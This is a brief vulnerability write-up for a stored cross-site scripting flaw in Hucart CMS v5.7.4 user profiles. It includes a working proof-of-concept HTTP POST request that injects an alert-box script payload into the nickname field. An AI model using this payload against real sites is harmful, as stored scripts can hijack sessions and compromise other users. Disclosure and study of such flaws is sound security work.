Hucart cms v5.7.4 XSS Vulnerability analysis
code analysis
Updating user information, data submitted by users and not filtering dangerous characters result in XSS storage vulnerabilities
After sending EXP, browsing user information triggers XSS vulnerability
POC
First register an account
http://127.0.0.1/hucart/user/index.php?load=login&act=reg
Then log in.
Exp Packets are provided here
Insert XSS payload at nickname
Triggered while browsing user's basic information
http://127.0.0.1/hucart/user/index.php?load=login&act=reg
POST /hucart/user/index.php?load=user_info&act=update_user HTTP/1.1
Host: 192.168.0.110
Content-Length: 1541
Cache-Control: max-age=0
Origin: http://192.168.0.110
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIVXHhUwlupAJTnM
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.0.110/hucart/user/?load=user_info&act=info_list
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k2mlv9rtdavtioa98nqajithm5; bdshare_firstime=1550149965528; ck_num=79385312dbee4c9e7270b26e4b3e1459
Connection: close
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_nick"
"><img src=# onerror=alert(1)>
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_image"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_truename"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_birthday"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_salt"
0
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_msn"
admin
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_qq"
123123
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_officephone"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_homephone"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_tel"
123123
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="province"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="city"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="district"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="pcd_all"
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_address"
------WebKitFormBoundarygIVXHhUwlupAJTnM--